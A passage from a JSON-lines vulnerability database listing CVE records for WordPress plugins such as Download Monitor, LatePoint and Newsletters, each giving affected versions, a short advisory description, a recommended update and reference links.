version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bac8c35b-2afa-4347-b86e-2f16db19a4d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bac8c35b-2afa-4347-b86e-2f16db19a4d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10092","slug":"download-monitor","versionImpact":"5.0.12","versionEndExcluding":"5.0.13","description":"The Download Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_handle_api_key_actions function in all versions up to, and including, 5.0.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to revoke existing API keys and generate new ones.","recommendation":"Update to version 5.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e50d8c-e61c-4e94-b5e8-b24832dc24b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e50d8c-e61c-4e94-b5e8-b24832dc24b6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.12\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php#L299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.12\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php#L299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173614\\\/download-monitor\\\/trunk\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173614\\\/download-monitor\\\/trunk\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8911","slug":"latepoint","versionImpact":"5.0.11","versionEndExcluding":"5.0.12","description":"The LatePoint plugin for WordPress is vulnerable to Arbitrary User Password Change via SQL Injection in versions up to, and including, 5.0.11. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note that changing a WordPress user's password is only possible if the \"Use WordPress users as customers\" setting is enabled, which is disabled by default. Without this setting enabled, only the passwords of plugin customers, which are stored and managed in a separate database table, can be modified.","recommendation":"Update to version 5.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c9a23a3-5eb5-4f5b-bf32-c9d163426f29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c9a23a3-5eb5-4f5b-bf32-c9d163426f29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8552","slug":"download-monitor","versionImpact":"5.0.9","versionEndExcluding":"5.0.10","description":"The Download Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the enable_shop() function in all versions up to, and including, 5.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable shop functionality.","recommendation":"Update to version 5.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3acaedff-f616-4b66-9208-f7e6a4df920d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3acaedff-f616-4b66-9208-f7e6a4df920d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.8\\\/src\\\/AjaxHandler.php#L317\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.8\\\/src\\\/AjaxHandler.php#L317\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157424\\\/#file17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157424\\\/#file17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5654","slug":"cf7-google-sheets-connector","versionImpact":"5.0.9","versionEndExcluding":"5.0.10","description":"The CF7 Google Sheets Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'execute_post_data_cg7_free' function in all versions up to, and including, 5.0.9. This makes it possible for unauthenticated attackers to toggle site configuration settings, including WP_DEBUG, WP_DEBUG_LOG, SCRIPT_DEBUG, and SAVEQUERIES.","recommendation":"Update to version 5.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0da4d55-5025-47cf-9f45-377d8943fc94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0da4d55-5025-47cf-9f45-377d8943fc94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-google-sheets-connector\\\/trunk\\\/includes\\\/class-gs-service.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-google-sheets-connector\\\/trunk\\\/includes\\\/class-gs-service.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099184\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099184\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4598","slug":"wp-slimstat","versionImpact":"5.0.9","versionEndExcluding":"5.0.10","description":"The Slimstat Analytics plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 5.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2959452%40wp-slimstat&new=2959452%40wp-slimstat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2959452%40wp-slimstat&new=2959452%40wp-slimstat&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07c0f5a5-3455-4f06-b481-f4d678309c50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07c0f5a5-3455-4f06-b481-f4d678309c50?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.0.8\\\/admin\\\/view\\\/wp-slimstat-db.php#L970\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.0.8\\\/admin\\\/view\\\/wp-slimstat-db.php#L970\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6923","slug":"matomo","versionEndExcluding":"5.0.1","description":"The Matomo Analytics \u2013 Ethical Stats. Powerful Insights. plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the idsite parameter in all versions up to, and including, 4.15.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e2d54eb-c176-49c4-a4fc-833e17189cad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e2d54eb-c176-49c4-a4fc-833e17189cad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031495%40matomo&new=3031495%40matomo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031495%40matomo&new=3031495%40matomo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12737","slug":"wp-base-booking-of-appointments-services-and-events","versionImpact":"4.9.2","versionEndExcluding":"5.0.0","description":"The WP BASE Booking of Appointments, Services and Events WordPress plugin before 5.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/997eb9f6-80e1-4bc5-be72-bd6a6f52379c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/997eb9f6-80e1-4bc5-be72-bd6a6f52379c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12558","slug":"wp-base-booking-of-appointments-services-and-events","versionImpact":"4.9.2","versionEndExcluding":"5.0.0","description":"The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive information from the database, such as the hashed administrator password.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-base-booking-of-appointments-services-and-events\\\/tags\\\/4.9.2\\\/includes\\\/freeons\\\/export-import.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-base-booking-of-appointments-services-and-events\\\/tags\\\/4.9.2\\\/includes\\\/freeons\\\/export-import.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210164\\\/wp-base-booking-of-appointments-services-and-events\\\/tags\\\/5.0.0\\\/includes\\\/freeons\\\/export-import.php?old=3207827&old_path=wp-base-booking-of-appointments-services-and-events%2Ftags%2F4.9.2%2Fincludes%2Ffreeons%2Fexport-import.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210164\\\/wp-base-booking-of-appointments-services-and-events\\\/tags\\\/5.0.0\\\/includes\\\/freeons\\\/export-import.php?old=3207827&old_path=wp-base-booking-of-appointments-services-and-events%2Ftags%2F4.9.2%2Fincludes%2Ffreeons%2Fexport-import.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09831b2f-8f79-4833-8fc6-f1af56c6abc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09831b2f-8f79-4833-8fc6-f1af56c6abc8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13439","slug":"tlp-team","versionImpact":"4.4.9","versionEndExcluding":"5.0.0","description":"The Team \u2013 Team Members Showcase Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the response() function in all versions up to, and including, 4.4.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tlp-team\\\/tags\\\/4.4.7\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/tlp-team\\\/tags\\\/4.4.7\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239948\\\/tlp-team\\\/trunk\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239948\\\/tlp-team\\\/trunk\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239948\\\/tlp-team\\\/trunk\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Skill.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239948\\\/tlp-team\\\/trunk\\\/app\\\/Controllers\\\/Admin\\\/Ajax\\\/Skill.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239948%40tlp-team&new=3239948%40tlp-team&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239948%40tlp-team&new=3239948%40tlp-team&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46951d8d-f8f1-4fb5-b02a-1a19edd154e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46951d8d-f8f1-4fb5-b02a-1a19edd154e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12415","slug":"infographic-and-list-builder-ilist","versionImpact":"4.9.0","versionEndExcluding":"5.0.0","description":"The The AI Infographic Maker plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.9.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infographic-and-list-builder-ilist\\\/trunk\\\/embed\\\/qcld-embed-link.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infographic-and-list-builder-ilist\\\/trunk\\\/embed\\\/qcld-embed-link.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210519%40infographic-and-list-builder-ilist&new=3210519%40infographic-and-list-builder-ilist&sfp_email=&sfph_mail=#file1030\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210519%40infographic-and-list-builder-ilist&new=3210519%40infographic-and-list-builder-ilist&sfp_email=&sfph_mail=#file1030\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227956%40infographic-and-list-builder-ilist&new=3227956%40infographic-and-list-builder-ilist&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227956%40infographic-and-list-builder-ilist&new=3227956%40infographic-and-list-builder-ilist&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aa21fad-4dd0-4ccd-a325-de3532a6ffaf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aa21fad-4dd0-4ccd-a325-de3532a6ffaf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1995","slug":"smart-custom-fields","versionImpact":"4.2.2","versionEndExcluding":"5.0.0","description":"The Smart Custom Fields plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relational_posts_search() function in all versions up to, and including, 4.2.2. This makes it possible for authenticated attackers, with subscrber-level access and above, to retrieve post content that is password protected and\/or private.","recommendation":"Update to version 5.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e966a266-4265-4a72-8a50-e872805219a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e966a266-4265-4a72-8a50-e872805219a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-custom-fields\\\/trunk\\\/classes\\\/fields\\\/class.field-related-posts.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-custom-fields\\\/trunk\\\/classes\\\/fields\\\/class.field-related-posts.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/inc2734\\\/smart-custom-fields\\\/commit\\\/67cb6d75bd8189668f721dbd2dc7a3036851be1b\",\"name\":\"https:\\\/\\\/github.com\\\/inc2734\\\/smart-custom-fields\\\/commit\\\/67cb6d75bd8189668f721dbd2dc7a3036851be1b\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052172%40smart-custom-fields&new=3052172%40smart-custom-fields&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052172%40smart-custom-fields&new=3052172%40smart-custom-fields&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1642","slug":"mainwp","versionImpact":"4.6.0.1","versionEndExcluding":"5.0","description":"The MainWP Dashboard  \u2013 WordPress Manager for Multiple Websites Maintenance plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.0.1. This is due to missing or incorrect nonce validation on the 'posting_bulk' function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c2d9569-a551-46f5-8581-464b9f35b71c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c2d9569-a551-46f5-8581-464b9f35b71c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp\\\/tags\\\/4.6.0.1\\\/pages\\\/page-mainwp-post-page-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp\\\/tags\\\/4.6.0.1\\\/pages\\\/page-mainwp-post-page-handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042125\\\/mainwp\\\/trunk\\\/pages\\\/page-mainwp-post-page-handler.php?old=3017011&old_path=mainwp\\\/trunk\\\/pages\\\/page-mainwp-post-page-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042125\\\/mainwp\\\/trunk\\\/pages\\\/page-mainwp-post-page-handler.php?old=3017011&old_path=mainwp\\\/trunk\\\/pages\\\/page-mainwp-post-page-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2018-25106","slug":"NebulaX","versionEndExcluding":"5.0","description":"A vulnerability, which was classified as critical, has been found in webuidesigning NebulaX Theme up to 5.0 on WordPress. This issue affects the function nebula_send_to_hubspot of the file libs\/Legacy\/Legacy.php. The manipulation leads to sql injection. The attack may be initiated remotely. The patch is named 41230a81db0f671c570c2644bc2f80565ca83c5a. It is recommended to apply a patch to fix this issue.","recommendation":"Update to version 5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/webuidesigning\\\/NebulaX\\\/commit\\\/41230a81db0f671c570c2644bc2f80565ca83c5a\",\"name\":\"https:\\\/\\\/github.com\\\/webuidesigning\\\/NebulaX\\\/commit\\\/41230a81db0f671c570c2644bc2f80565ca83c5a\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.289163\",\"name\":\"VDB-289163 | CTI Indicators (IOB, IOC, TTP, IOA)\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.289163\",\"name\":\"VDB-289163 | webuidesigning NebulaX Theme Legacy.php nebula_send_to_hubspot sql injection\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0378","slug":"greenshift-animation-and-page-builder-blocks","versionEndExcluding":"5.0","description":"The Greenshift WordPress plugin before 5.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3313cc05-2267-4d93-a8a8-2c0701c21f66\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3313cc05-2267-4d93-a8a8-2c0701c21f66\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13739","slug":"newsletters-lite","versionImpact":"4.9.9.7","versionEndExcluding":"4.9.9.8","description":"The Newsletters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \"to\" parameter in all versions up to, and including, 4.9.9.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an admin user into performing an action such as clicking on a link.","recommendation":"Update to version 4.9.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.7\\\/views\\\/admin\\\/history\\\/view.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.7\\\/views\\\/admin\\\/history\\\/view.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2578a863-4129-4f56-8b18-65b2d2b972e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2578a863-4129-4f56-8b18-65b2d2b972e3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2009","slug":"newsletters-lite","versionImpact":"4.9.9.7","versionEndExcluding":"4.9.9.8","description":"The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the logging functionality in all versions up to, and including, 4.9.9.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.9.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/views\\\/admin\\\/settings\\\/view_logs.php?rev=3212300#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/views\\\/admin\\\/settings\\\/view_logs.php?rev=3212300#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257980\\\/newsletters-lite\\\/trunk\\\/views\\\/admin\\\/settings\\\/view_logs.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257980\\\/newsletters-lite\\\/trunk\\\/views\\\/admin\\\/settings\\\/view_logs.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3825c80c-e4b1-4dd8-be77-38f718920b9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3825c80c-e4b1-4dd8-be77-38f718920b9a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8247","slug":"newsletters-lite","versionImpact":"4.9.9.2","versionEndExcluding":"4.9.9.3","description":"The Newsletters plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 4.9.9.2. This is due to the plugin not restricting what user meta can be updated as screen options. This makes it possible for authenticated attackers, with subscriber-level access and above, to escalate their privileges to that of an administrator. Please note that this only affects users with access to edit\/update screen options, which means an administrator would need to grant lower privilege users with access to the Sent & Draft Emails page of the plugin in order for this to be exploited.","recommendation":"Update to version 4.9.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2577102f-6355-4483-bd3d-1948497cb843?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2577102f-6355-4483-bd3d-1948497cb843?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.1\\\/wp-mailinglist.php#L3279\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.1\\\/wp-mailinglist.php#L3279\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3146287%40newsletters-lite&new=3146287%40newsletters-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3146287%40newsletters-lite&new=3146287%40newsletters-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7411","slug":"newsletters-lite","versionImpact":"4.9.9","versionEndExcluding":"4.9.9.1","description":"The Newsletters plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 4.9.9. This is due the plugin not preventing direct access to the \/vendor\/mobiledetect\/mobiledetectlib\/export\/exportToJSON.php. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 4.9.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cbf52b0-4c7f-40fb-aedb-4c70f6510b1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cbf52b0-4c7f-40fb-aedb-4c70f6510b1b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135786\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135786\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2472","slug":"LatePoint","versionImpact":"4.9.9","versionEndExcluding":"4.9.9.1","description":"The LatePoint Plugin plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'start_or_use_session_for_customer' function in all versions up to and including 4.9.9. This makes it possible for unauthenticated attackers to view other customer's cabinets, including the ability to view PII such as email addresses and to change their LatePoint user password, which may or may not be associated with a WordPress account.","recommendation":"Update to version 4.9.9.1, or a newer patched 